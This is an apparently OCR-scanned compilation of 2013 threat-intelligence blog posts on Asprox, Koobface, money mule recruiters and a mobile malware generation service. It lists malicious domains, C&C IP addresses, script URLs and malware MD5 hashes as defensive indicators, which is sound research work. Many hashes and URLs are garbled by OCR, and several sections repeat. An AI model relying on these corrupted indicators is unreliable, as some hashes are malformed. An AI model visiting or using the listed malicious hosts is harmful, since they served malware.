10000taxi.ru 
1001domains.ru 
100yss.ru 
124k.ru 


Moreover, we also got a decent number of malicious MD5s known to have used the same 
IP as C &C ove the last couple of months, indicating that the artifact is still part of the C &C 
infrastructure of active campaigns. 


The following malicious MD5s are also known to have phoned back to the same IP over 
the last couple of months: 

MD5: 3e3d249c43950ac8bedb937f1lea347f5 

MD5: 398b5f0c4b8f9adb1db8420801b52562 

MD5: 9a1602a2693ae510339ef5f0d25be0b3 

MD5: 9bc423773de47d95de1718173ec8485f 

MD5: 637db36286b3e300c37e99a0b4772548 

MD5: 9829c64613909fbb13fc402f23baff1b 

MD5: f23562bafd94f7b836633f1fb7f9e1 8f 

MD5: 7d263c93829447b2399c2e981d66c9df 
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MD5: 6ee37ead84906711cb2eed6d7f2fcc88 
MD5: 54eb099176e7d65817d1b9789845ee4e 
MD5: 723618efbd0d3627da09a770e5fd28c2 
MD5: 151030c819209af9b7b2ecf2f5c31aa0 
MD5: 279d390b9116f0f8ac80321e5fa43453 
MD5: f78ff547ce388a403f5ba979025cd556 
MD5: afa7090479ac49a3547931fe249c52e3 
MD5: a2565684ae4c0af5a99214da83664927 
MD5: ce4f032a3e478f4d4cac959b2e999b5a 


Known to have responded to 5.63.152.19 are also the following malicious domains: 
6tn.ru 

azosi.ru 

bi-news.ru 
buygroup.ru 
dnpsirius.ru 
enterplus.ru 
nemohuildiin.ru 
nfs-worlds.ru 
rassylka-na-doski.ru 
santehnikaoptom.ru 
v-odnoklassniki.ru 


In a cybercrime ecosystem dominated by leaked [10]DIY mass Web site hacking tools, 
and [11]sophisticated iframe-ing platforms, malicious artifacts are a great reminder that as 
long as the Web site remains susceptible to remote exploitation, it’s only a matter of time be- 
fore a potential cybercriminal embeds/injects malicious script on it. That’s cybercrime-friendly 
common sense. 


This post has been reproduced from [12]Dancho Danchev’s blog . Follow him 
[13]Jon Twitter. 


1. http://www.webroot.com/blog/2012/11/26/cybercriminals-release-stealthy-diy-mass-iframe-injecting-apache-2 


2. http://www.webroot .com/blog/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass-iframe-embedd 


3. : 

4. , 

5. : 

. 
ad: : 

8. : 

9. 


ttp://ddanchev. blogspot .com/2010/07/dissecting-xerox-workcentre-pro-scanned. htm 
ttp://ddanchev.blogspot.com/2010/08/spamvertised-best-buy-macys-evite-and. html 
ttp://ddanchev.blogspot.com/2010/08/spamvertised-best-—buy-macys-evite-and. html 


ttp://www.webroot .com/blog/2013/11/01/peek- inside- google-dorks-based-mass-sql-injecting-tool/ 


11. http://www.webroot .com/blog/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass-iframe-embe 


dding-platform-released-on-the-underground-marketplace/ 
12. http://ddanchev. blogspot .com/ 
13. http://twitter .com/danchodanche 
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9.11.3 Malicious Script Artifacts at China Green Dot Gov Dot Cn - A Reminiscence of 
Asprox’s Multi-Tasking Activities (2013-11-04 18:33) 


titi 
Titi ea: 


tEttl 
iii: 


Malware artifacts, [l]abandoned mass iframe [2]embedded/injected campaigns, and low 
Quality Assurance (QA) campaigns, continue popping up on everyone’s radar, raising eye- 
brows as to the extend of incompetence, possible evasive tactics, plain simple lack of applied 
QA when maintaining these campaigns, or the end of a campaign’s life cycle. 


What’s the value of assessing such a non-active campaign? Can the analysis provide 
any clues into related currently active malicious campaigns that typically for such type of 
campaigns, continue relying on the same malicious infrastructure? But of course. 


Let’s assess the malicious artifacts at hxxp://chinagreen.gov.cn, connect them to the 
multi-tasking activities conducted on behalf of the Asprox botnet, as well as several spamver- 
tised malware campaigns circa 2010, and most importantly provide actionable intelligence 
on currently active campaigns that continue using the very same infrastructure for command 
and control purposes. 


Malicious scripts at China Green Dot Gov Dot CN: 


update.webserviceftp.ru/js.js - seen in "[3]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 


gdi.webserviceftp.ru/js.js - seen in "[4]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 


ver.webserivcekota.ru/js.js - seen in "[5]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 


batch.webserviceaan.ru/js.js - seen in "[6]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 


nemohuildiin.ru/tds/go.php?sid=1 - seen in "[7]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 
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parkperson.ru:8080/index.php?pid=13 - seen in "[8]Spamvertised Best Buy, Macy’s, Evite 
and Target Themed Scareware/Exploits Serving Campaign" 


nutcountry.ru:8080/index.php?pid=13 - seen in "[9]Spamvertised Best Buy, Macy’s, Evite and 
Target Themed Scareware/Exploits Serving Campaign" 


What’s so special about the spamvertised XeroxWorkCentre Pro campaign is that, back 
in 2010, it used to drop an Asprox sample, naturally phoning back to well known Asprox C &Cs 
at the time. 


nemohuildiin.ru is known to have responded to 31.31.204.61 and most recently to 5.63.152.19 


Known to have responded to the same IP (31.31.204.61) are also the following mali- 
cious domains: 


000sstd.com 
02143.ru 
03111991.ru 
0414.ru 
0424.ru 
050175.ru 
054ru.ru 
06140.ru 
0664346910.ru 
0801.ru 
08108.ru 
087474.ru 
08755.ru 
0925.ru 


Ogo.ru 
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1-androds.ru 


10000taxi.ru 


1001domains.ru 


100yss.ru 


124k.ru 


Moreover, we also got a decent number of malicious MD5s known to have used the same 
IP as C &C ove the last couple of months, indicating that the artifact is still part of the C &C 
infrastructure of active campaigns. 


The following malicious MD5s are also known to have phoned back to the same IP over 
the last couple of months: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 
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3e3d249c43950ac8bedb937f1lea347f5 


398b5f0c4b8f9adb1db8420801b52562 


9a1602a2693ae510339ef5f0d25be0b3 


9bc423773de47d95de1718173ec8485f 


637db36286b3e300c37e99a0b4772548 


9829c64613909fbb13fc402f23baff1b 


f23562bafd94f7b836633f1fb7f9e1 BF 


7d263cC93829447b2399c2e981d66c9df 


6ee37ead84906711cb2eed6d7f2fcc88 


54eb099176e7d65817d1b9789845ee4e 


723618efbd0d3627da09a770e5fd28c2 


151030c819209af9b7b2ecf2f5c31aa0 


279d390b9116f0f8ac80321e5fa43453 


f78ff547ce388a403f5ba979025cd556 


MD5: afa7090479ac49a3547931fe249c52e3 
MD5: a2565684ae4c0af5a99214da83664927 


MD5: ce4f032a3e478f4d4cac959b2e999b5a 


Known to have responded to 5.63.152.19 are also the following malicious domains: 
6tn.ru 

azosi.ru 

bi-news.ru 
buygroup.ru 
dnpsirius.ru 
enterplus.ru 
nemohuildiin.ru 
nfs-worlds.ru 
rassylka-na-doski.ru 
santehnikaoptom.ru 


v-odnoklassniki.ru 


In a cybercrime ecosystem dominated by leaked [10]DIY mass Web site hacking tools, 
and [11]sophisticated iframe-ing platforms, malicious artifacts are a great reminder that as 
long as the Web site remains susceptible to remote exploitation, it’s only a matter of time be- 
fore a potential cybercriminal embeds/injects malicious script on it. That’s cybercrime-friendly 
common sense. 


Updates will be posted as soon as new developments take place. 


1. http://www.webroot.com/blog/2012/11/26/cybercriminals-release-stealthy-diy-mass-iframe-injecting-apache-2 


2. http://www.webroot .com/blog/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass-iframe-embedd 
3, http://adanchev. blogspot. con/2010/01 /Aissecting-xerox-vorkcertre=pro-scamned. bial 
4. heep://adanchev. blogspot con/2010/01 /Aissecting-xeror-vorkcentre~pro~scamed. html 
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5, tip:/ danchev.blogepot con/2010/07 /dissecting-xerox-vorkcentre-pro~ scanned, Heal 
6. http: //adanchev. blogspot .con/2010/07 dissect ing-reror-vorkcentre-pro-scanned. html 
7, hetp://adanchev blogepot .con/2010/07 /ddesecting-xerox-vorkcentre~pro-ecazed. heal 
8. http: / /ddanchev. blogspot .con/2010/08/ spanverised-best~buy-nacys~evite-and. tml 
9, http://ddanchey blogspot .con/2010/06/spanverised-best~buy-nacys~evite-and. html 


10. http: //www.webroot .com/blog/2013/11/01/peek- inside-google-dorks-based-mass-sql-injecting-tool/ 


11. ttp://www.webroot.com/blog/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass-iframe-embe 


dding-platform-released-on-the-underground-marketplace/ 


9.11.4 Scareware, Blackhat SEO, Spam and Google Groups Abuse, Courtesy of the 
Koobface Gang (2013-11-04 18:36) 


Ly 


The Koobface gang is known to have embraced the potential of the “underground multi- 
tasking" model a long time ago, in order to achieve the "malicious economies of scale" effect. 
This "underground multi-tasking" most commonly comes in the form of multiple monetization 
Campaigns, which upon closer analysis always lead back to the Koobface gang’s infrastructure. 
In fact, the gang is so obsessed with efficiency, that particular redirectors and key malicious 
domains for a particular campaign, are also, simultaneously rotated across all the campaigns 
that they manage. 


For instance, throughout the past half an year, a huge percentage of the malicious in- 
frastructure used simultaneously in multiple campaigns, was parked on the [1]now shut down 
Riccom LTD - AS29550. From the [2]massive blackhat SEO campaigns affecting millions of 
legitimate web sites managed by the gang, to the [3]malvertising attack at the New York 
Times web site, and [4]the click-fraud facilitating [5]Bahama botnet, the Koobface botnet 
is only the tip of the iceberg for the efficient and fraudulent money machine that the gang 
operates. 


Li 


In this analysis, I'll once again establish a connection between the ongoing blackhat SEO 
Campaigns managed by the gang ([6J/Blackhat SEO Campaign Hijacks U.S Federal Form Key- 
words, Serves Scareware; [7]U.S Federal Forms Blackhat SEO Themed Scareware Campaign 
Expanding; [8]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign), 
with a spam campaign that’s also syndicated across multiple Google Groups, and the Koobface 
botnet itself, with a particular emphasis on the scareware monetization taking place across all 
the campaigns. 


Related Koobface research and analysis: 

[9]The Koobface Gang Wishes the Industry "Happy Holidays" 
[10]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[11]Koobface Botnet Starts Serving Client-Side Exploits 
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[12]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[13]Koobface Botnet’s Scareware Business Model - Part Two 
[14]Koobface Botnet’s Scareware Business Model - Part One 
[15]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[16]New Koobface campaign spoofs Adobe’s Flash updater 
[17]Social engineering tactics of the Koobface botnet 
[18]Koobface Botnet Dissected in a TrendMicro Report 
[19]Movement on the Koobface Front - Part Two 
[20]Movement on the Koobface Front 

[21]Koobface - Come Out, Come Out, Wherever You Are 
[22]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [23]Dancho Danchev’s blog. 
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. http: //ddanchev.blogspot .com/2009/12/koobface- gang-wishes-industry-happy. htm 
10. http://ddanchev. blogspot .com/2009/12/koobface-friendly-riccom-1td- 
. http://ddanchev. blogspot .com/2009/11/koobface-botnet-starts-serving-client .htm 
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. http://ddanchev. blogspot .com/2009/09/koobface-botnets-scareware-business.htm 

. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 

. http://blogs.zdnet .com/security/?p=4594 

. http://content .zdnet.com/2346-12691_22-352597 .htm 

. http://ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro. html 
. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 

. http://ddanchev. blogspot .com/2009/08/movement- on-koobface-front.htm 
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9.11.5 Facebook FarmTown Malvertising Campaign Courtesy of the Koobface Gang 
(2013-11-04 18:36) 


Earlier this week, another malvertising campaign affected a popular community, in the face 
of Facebook’s FarmTown. 


You have to analyze, and cross-check it to believe it. 


Key summary points: 
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* the email test@now.net.cn used to register all the domains involved in the malvertising 
Campaign, is exclusively used by the Koobface gang for numerous scareware registrations 
seen - 


9.11.6 Money Mule Recruiters Trick Mules Into Installing Fake Transaction Certifi- 
cates (2013-11-04 18:37) 


What is more flattering than Ukrainian blackhat SEO gangs using name as redirectors, includ- 
ing offensive messages, the Koobface gang redirecting Facebook’s IP space to your blog, ora 
plain simple danchodanchev admin panel within a Crime Pack kit? 


It’s the money mule recruiters who modify the HOSTS file of gullible mules to redirect 
ddanchev.blogspot.com and bobbear.co.uk to 127.0.0.1. Now that’s flattering, considering 
the fact that my public money mule ecosystem related research represents a tiny percentage 
of the real profiling/activities taking place behind the curtains. 


a 


Related coverage of money laundering/recruitment in the context of cybercrime: 
[1]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[2]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[4]Money Mule Recruiters on Yahoo!’s Web Hosting 

[5]Dissecting an Ongoing Money Mule Recruitment Campaign 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[7]Keeping Reshipping Mule Recruiters on a Short Leash 
[8]Keeping Money Mule Recruiters on a Short Leash 
[9]Standardizing the Money Mule Recruitment Process 

[10]Inside a Money Laundering Group’s Spamming Operations 
[11]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[12]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him 
[14]on Twitter. 


1. http: //ddanchev. blogspot .com/2010/04/keeping-money-mule-recruiters-on-short.htm 
2. http: //ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving. html 
3. http: //ddanchev. blogspot .com/2010/03/keeping-money-mule-recruiters-on-short.htm 
4. - - i - 


http: //ddanchev. blogspot .com/2010/03/money-mule-recruiters-on-yahoos-web. htm 
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. http: //ddanchev.blogspot .com/2010/02/dissecting-ongoing-money-mule.htm 
. http: //ddanchev.blogspot .com/2010/02/keeping-money-mule-recruiters-on-short .htm 


5 
6 
7. http://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on. html 
8 
9 


. http: //ddanchev.blogspot .com/2009/11/keeping-money-mule-recruiters-on-short .htm 


. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment.htm 


ttp://ddanchev. blogspot .com/2009/05/inside-money-1laundering-groups- spamming. html 


11. http://ddanchev. blogspot .com/2008/07/money-mule-recruiters—use-asproxs-fast.htm 
12. http://ddanchev. blogspot .com/2008/10/money-mules-syndicate-actively.htm 
. http://ddanchev. blogspot .com/ 


13 
14. http://twitter .com/danchodanche 


9.11.7 A Peek Inside a Customer-ized APlI-enabled DIY Online Lab for Generating 
Multi-OS Mobile Malware (2013-11-12 02:57) 


a ! oe. 
TI symbian eG Iphone S El Windows 
ANDROID OS iPad Java one lackBerry 


The exponential growth of mobile malware over the last couple of years, can be attributed to 
a variety of ‘growth factors’, the majority of which continue playing an inseparable role in the 
overall success and growth of the cybercrime ecosystem in general. 


Tactics like [1]standardization, efficiency-oriented monetization, systematic bypassing of 
industry accepted/massively adopted security measures like signatures-based antivirus 
scanning, [2]affiliate networks helping cybercriminals secure revenue streams for their 
malicious/fraudulent tactics, techniques and procedures (TTPs), as well as pseudo legal 
distribution of deceptive software - think scaware with long EULAs and ToS-es - as well as 
mobile applications - think [3]subscription based premium rate SMS malware with long EULAs 
and ToS-es - continue dominating the arsenal of tactics that any cybercriminal aspiring the 
occupy a market share in any market segment within the cybercrime ecosystem, can easily 
take advantage of in 2013. 


What has changed over the last couple of years, in terms of concepts? A lot. For in- 
stance, back in 2007, approximately one year after | (publicly) anticipated the upcoming and 
inevitable [4]monetization of mobile malware, the Red Browser started making its rounds, 
proving that | was sadly wrong, and once again, money and greed - or plain simple profit 
maximization to others - would play a crucial role in this emerging back then, cybercrime 
ecosystem market segment for mobile malware. [5]Similar monetization attempts on behalf 
of cybercriminals, then followed, to further strengthen the ambitions of cybercriminals into 
this emerging market segment. 


With "[6]malicious economies of scale" just starting to materialize at the time, it didn’t 
take long before the concept started getting embedded into virtually each and every 
cybercrime-friendly product/service advertised on the market. Thanks to [7]Symbian OS 
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dominating the mobile operating system at the time, opportunistic cybercriminals quickly 
adapted to steal a piece of the pie, by releasing multiple [8]Symbian based malware variants. 
Sharing is caring, therefore, here are some MD5s from the Symbian malicious code that used 
to dominate the threat landscape, back then. 


Symbian OS malware MD5s from that period of time, for historical OSINT purposes: 
MD5: a4a70d9c3dbe955dd88ea6975dd909d8 
MD5: 98f7cfd42df4a0le2c4f2ed6d38clafl1 
MD5: 6fd6b68ed3a83b2850fe293c6db8d78d 
MD5: 38837c60e2d87991c6c754f8a6fb5c2d 
MD5: ace9c6c91847b29aefa0a50d3b54bac5 
MD5: 3f1828f58d676d874a3473cl1cd01a431 
MD5: 2163ef88da9bd31f471087a55f49d1b1 
MD5: 0a04f6fed68dec7507d7bf246aa265eb 
MD5: ad4a9c68f631d257bd76490029227e41 
MD5: 7a4639488b4698f131e42de56ceeb45d 
MD5: fa3de591d3a7353080b724a294dca394 
MD5: 5ba5fad8923531784cd06aledc6e0001 
MD5: 66abbd9a965b2213f895e297f40552e5 
MD5: 92b069ef1fd9a5d9c78a2d3682c16b8f 
MD5: a494da11f47a853308bfdb3c0705f4el 
MD5: 9f38eff6c58667880d1ff9feb9093dcb 
MD5: a8a3ac5f7639d82b24e9eb4f9ec5981¢c 
MD5: Oebc8e9f5ec72a0ff73a73d81dc6807d 
MD5: a3cd8f8302a69e786425e51467ad5f7c 
MD5: 38837c60e2d87991c6c754f8a6fb5c2d 
MD5: 522a8efdc382b38e336d4735a73e6b23 
MD5: 052abb9b41f07192e8a02f0746e80280 
MD5: 712a1184c5fc1811192cba5cc7feda51 
MD5: bdae8a51d4f12762b823e42aa6c3fa0a 
MD5: aec4b95aa8d80ee9a57d11cb16ce75ba 
MD5: 66854f2171cca50f49dlace2d454065a 
MD5: 945279ce239d2370e4a65b4f109b533b 
MD5: cde433d371228fb7310849c03792479e 
MD5: 957265e799246225e078a6d65bde5717 
MD5: cde433d371228fb7310849c03792479e 
MD5: 1f1074b709736fe4504302cbc06fd0f6 
MD5: 1cd241a5ea55eb25baf50af25629af27 
MD5: 60d9a75b5d3320635f9e33fe76b9b836 
MD5: e23f69eea5fa000f259e417b64210d42 
MD5: 36503b8a9e2c39508a50eb0bdbb66370 
MD5: 1f1074b709736fe4504302cbc06fd0f6 
MD5: dal13e08a8778fa4eald60e8b126e27be 
MD5: 642495185b4b22d97869007fcbc0e00f 
MD5: 9af5d82f330bbc03f35436b3cc2fba3a 
MD5: 6099516a39abb73f9d7f99167157d957 
MD5: 6c75b3e9bf4625dc1b754073a2d0c4f1 
MD5: e23f69eea5fa000f259e417b64210d42 
MD5: ffb37b431ed1f0ac5764b57fa8d4cced 
MD5: 1cd241a5ea55eb25baf50af25629af27 
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MD5: b3055e852b47979a774575c09978981a 
MD5: 9f38eff6c58667880d1ff9feb9093dcb 
MD5: 945279ce239d2370e4a65b4f109b533b 
MD5: 66a0bbebbe14939706093aa5831b53a7 
MD5: 30a2797f33ecb66524e01a63e49485dd 
MD5: 785e921ea686c2fc8514fac94dd8a9cd 
MD5: 69a68bdcbad227d5d8d1a27dd9c30ce7 
MD5: f246b101bc66fe36448d0987a36c3e0a 
MD5: 4fd086a236c2f3c70b7aa869fa7 3f762 
MD5: 642495185b4b22d97869007fcbcOe00f 
MD5: fd8b784df4bbb8082a7534841aa02f0e 
MD5: 3ee70d31d0a3b6fab562c51d8ff70e6d 
MD5: 3381d21f476d123dcf3b5cbc27b22ael 
MD5: 006b32148ce6747fddb6d89e5725573e 
MD5: 7a4639488b4698f131e42de56ceeb45d 
MD5: b9667e23bd400edcafde58b61ac05f96 
MD5: 12527fd41dd6b172f8e28049011lebd05 
MD5: c9baecbh122bb6d58f765aaca800724d2 
MD5: 799531e06e6aal9d569595d32d16f7cc 
MD5: e301¢c2135724db49f4dd5210151le8ae9 
MD5: 29d7c73bd737d5bb48f272468a98d673 


In 2013, we can easily differentiate between the [9]botnet building type of [10]two-factor 
authentication bypassing mobile trojans, and the ubiquitous for the market segment, subscrip- 
tion based premium rate SMS malware, relying on deceptive advertising and successful ‘visual 
social engineering’ campaigns. The second, continue getting largely monetized through one 
of the primary growth factors of the mobile market segment, namely, [11]affiliate networks 
for mobile malware. 


In this post, I'll profile what can be best described as a sophisticated, customer-ized, 
customization and efficiency oriented, APl-supporting, DIY mobile "lab" for generating, man- 
aging and operating multi-mobile-operating systems type of mobile malware campaigns. 
The service’s unique value proposition (UVP) in comparison to that of competing "labs" for 
managing, operating and converting mobile traffic - [12 ]acquisition and selling of [13]mobile 
traffic is a commoditized underground market item in 2013 - orbits around the feature rich 
interface, offering 100 % customization, monitoring and generally operating the campaigns, 
while efficiently earning fraudulently obtained revenue from unsuspecting mobile device users. 


Sample screenshots featuring the administration panel of an affiliate network partici- 
pant: 
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Sample "system" domains used for hosting/rotating the generated mobile malware samples 
courtesy of the service: 
jmobi.net - 91.202.63.75 
omoby.net - 91.202.63.75 
rrmobi.net - 91.202.63.75 
moby-aa.ru - 91.202.63.75 
mobyc.net - 91.202.63.75 
mobi-files.com - 91.202.63.75 
mobyw.net - 91.202.63.75 
mobyy.net - 91.202.63.75 
mobyc.net - 91.202.63.75 
mobyz.net - 91.202.63.75 


Known to have responsed to the same IP are also the following malicious domains: 
doklamenol.ru 
doklameno2.ru 
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downloadakpinstall.ru 
mobiy.net 
moby-aa.ru 
moby-ae.ru 
mobyc.net 
mobyw.com 
mobyw.net 
mobyy.net 
mobyz.net 
omoby.net 
rrmobi.net 
system-update.ru 
telefontown.pp.ua 


Sample Web sites serving multi-mobile-operating-system premium rate mobile malware, 


relying on the service: 


MOBILE 
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SLELPING 
YCTAHOBMTE 
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NON 
we 


OSMOS HD STICK STUNT SHAKE SPEARS! SUBBLE DROP ASTORY OFA 
BIKER ' BAND 
' YCTAHOBMTt 
YCTAHOBMTE 
YCTAHOBMTHE YCTAHOBMTHM YCTAHOBHTE 
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Samples generated and currently distributed in the wild using the service: 

[14]MD5: ac69514f9632539f9e8ad7b944556ed8 - detected by 15 out of 48 antivirus scanners 
as HEUR:Trojan-SMS.AndroidOS.Stealer.a 

[15]MD5: e62f97a095ca15747bb529ee9f1b5057 - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 

[16]MD5: 0688dac2754cce01183655bbbe50a0b1 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 

[17]MD5: 4062a77bda6adf6094f4ab209c71b801 - detected by 2 out of 44 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 

[18]MD5: 42a6cf362dbff4fd1b5aa9e82c5b7b56 - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 

[19]MD5: 3bcbe78a2fa8c050ee52675d9ec931ad - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 

[20]MD5: 53d3d35cf896938e897de002db6ffc68 - detected by 2 out of 47 antivirus scanners 
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as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[21]MD5: 2f66735b37738017385cc2fb56c21357 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[22]MD5: 0ec1l1lbba4a6a86eb517 1lecad89d78d05 - detected by 2 out of 47 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[23]MD5: 9f059c973637f105271d345a95787a5f - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[24]MD5: f179a067580014b1e16900b90d90a872 - detected by 2 out of 47 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[25]MD5: aef4f659943cbc530e4e1b601e75b19e - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[26]MD5: 8a00786ed6939a8ece2765d503c97ff8 - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[27]MD5: 868fcf05827c092fa1939930c2f50016 - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[28]MD5: a6ef49789845ed1a66f94fd7ccO89elb - detected by 2 out of 47 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[29]MD5: 22aa473772b2dfb0f019dac3b8749bb6 - detected by 2 out of 45 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[30]MD5: 52b74046d0c123772566d591524b3bf7 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 
[31]MD5: bbff61a2e3555a6675bc77621be19a73 - detected by 2 out of 46 antivirus scanners 
as Java.SMSSend.780; J2ME/TrojanSMS.Agent.DX 


[32]Cybercrime-friendly affiliate networks continue, and will continue to represent a ma- 
jor driving factor behind the growth of any market segment within the cybercrime system, 
as they result in a win-win-lose scenario for their operations, participants and the potential 
victims of the fraudulent/malicious propositions/releases courtesy of these networks. With 
mobile traffic acquisition available on demand based on any given preference a potential could 
have, cybercriminals would continue converting it into victims, cashing in on their overall lack 
of awareness of the TTPs of today’s modern cybercriminals. 


This post has been reproduced from [33]Dancho Danchev’s blog . Follow him 
[34]on Twitter. 
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9.11.8 A Peek Inside a Customer-ized APlI-enabled DIY Online Lab for Generating 
Multi-OS Mobile Malware (2013-11-12 02:57) 


4847 


r.- i Hi 
i! symbian a iPhone & Ej Windows = 
ANDROID OS iPad java Phone BlackBerry 


The exponential growth of mobile malware over the last couple of years, can be attributed to 
a variety of ‘growth factors’, the majority of which continue playing an inseparable role in the 
overall success and growth of the cybercrime ecosystem in general. 


Tactics like [1]standardization, efficiency-oriented monetization, systematic bypassing of 
industry accepted/massively adopted security measures like signatures-based antivirus 
scanning, [2]affiliate networks helping cybercriminals secure revenue streams for their 
malicious/fraudulent tactics, techniques and procedures (TTPs), as well as pseudo legal 
distribution of deceptive software - think scaware with long EULAs and ToS-es - as well as 
mobile applications - think [3]subscription based premium rate SMS malware with long EULAs 
and ToS-es - continue dominating the arsenal of tactics that any cybercriminal aspiring the 
occupy a market share in any market segment within the cybercrime ecosystem, can easily 
take advantage of in 2013. 


What has changed over the last couple of years, in terms of concepts? A lot. For in- 
stance, back in 2007, approximately one year after | (publicly) anticipated the upcoming and 
inevitable [4]monetization of mobile malware, the Red Browser started making its rounds, 
proving that | was sadly wrong, and once again, money and greed - or plain simple profit 
maximization to others - would play a crucial role in this emerging back then, cybercrime 
ecosystem market segment for mobile malware. [5]Similar monetization attempts on behalf 
of cybercriminals, then followed, to further strengthen the ambitions of cybercriminals into 
this emerging market segment. 


With "[6]malicious economies of scale" just starting to materialize at the time, it didn’t 
take long before the concept started getting embedded into virtually each and every 
cybercrime-friendly product/service advertised on the market. Thanks to [7]Symbian OS 
dominating the mobile operating system at the time, opportunistic cybercriminals quickly 
adapted to steal a piece of the pie, by releasing multiple [8]Symbian based malware variants. 
Sharing is caring, therefore, here are some MD5s from the Symbian malicious code that used 
to dominate the threat landscape, back then. 
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Symbian OS malware MD5s from that period of time, for historical OSINT purposes: 
MD5: a4a70d9c3dbe955dd88ea6975dd909d8 
MD5: 98f7cfd42df4a0le2c4f2ed6d38clafl 
MD5: 6fd6b68ed3a83b2850fe293c6db8d78d 
MD5: 38837c60e2d87991c6c754f8a6fb5c2d 
MD5: ace9c6c91847b29aefa0a50d3b54bac5 
MD5: 3f1828f58d676d874a3473clcd01a431 
MD5: 2163ef88da9bd31f471087a55f49d1b1 
MD5: Oa04f6fed68dec7507d7bf246aa265eb 
MD5: ad4a9c68f631d257bd76490029227e41 
MD5: 7a4639488b4698f131e42de56ceeb45d 
MD5: fa3de591d3a7353080b724a294dca394 
MD5: 5ba5fad8923531784cd06aledc6e0001 
MD5: 66abbd9a965b2213f895e297f40552e5 
MD5: 92b069ef1fd9a5d9c78a2d3682c16b8f 
MD5: a494da11f47a853308bfdb3c0705f4el 
MD5: 9f38eff6c58667880d1ff9feb9093dcb 
MD5: a8a3ac5f7639d82b24e9eb4f9ec5981c 
MD5: Oebc8e9f5ec72a0ff73a73d81dc6807d 
MD5: a3cd8f8302a69e786425e51467ad5f7c 
MD5: 38837c60e2d87991c6c754f8a6fb5c2d 
MD5: 522a8efdc382b38e336d4735a73e6b23 
MD5: 052abb9b41f07192e8a02f0746e80280 
MD5: 712a1184c5fc1811192cba5cc7feda51 


MD5: bdae8a51d4f12762b823e42aa6c3fa0a 
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aec4b95aa8d80ee9a57d11cb16ce75ba 


6b6854f2171cca50f49d1ace2d454065a 


945279ce239d2370e4a65b4f109b533b 


cde433d371228fb7310849c03792479e 


957265e799246225e078a6d65bde5717 


cde433d371228fb7310849c03792479e 


1f1074b709736fe4504302cbc06fd0T6 


1cd241a5ea55eb25baf50af25629af27 


60d9a75b5d3320635f9e33fe76b9b836 


e23f69eea5fa000f259e417b64210d42 


36503b8a9e2c39508a50eb0bdbb66370 


1f1074b709736fe4504302cbc06fd0T6 


dal3e08a8778fa4eald60e8b126e27be 


642495185b4b22d97869007fcbc0e00f 


9af5d82f330bbc03f35436b3cc2fba3a 


6099516a39abb73f9d7f99167157d957 


6c75b3e9bf4625dc1b754073a2d0c4fl1 


e23f69eea5fa000f259e417b64210d42 


ffo37b431ed1f0ac5764b57fa8d4cced 


1cd241a5ea55eb25baf50af25629af27 


b3055e852b47979a774575c09978981a 


9f38eff6c58667880d1ff9feb9093dcb 


945279ce239d2370e4a65b4f109b533b 


66a0bbebbe14939706093aa5831b53a7 


30a2797f33ecb66524e01a63e49485dd 


MD5: 785e921ea686c2fc8514fac94dd8a9cd 

MD5: 69a68bdcbad227d5d8d1a27dd9c30ce7 
MD5: f246b101bc66fe36448d0987a36c3e0a 
MD5: 4fd086a236c2f3c70b7aa869fa7 3f762 

MD5: 642495185b4b22d97869007fcbc0e00f 
MD5: fd8b784df4bbb8082a7534841aa02f0e 
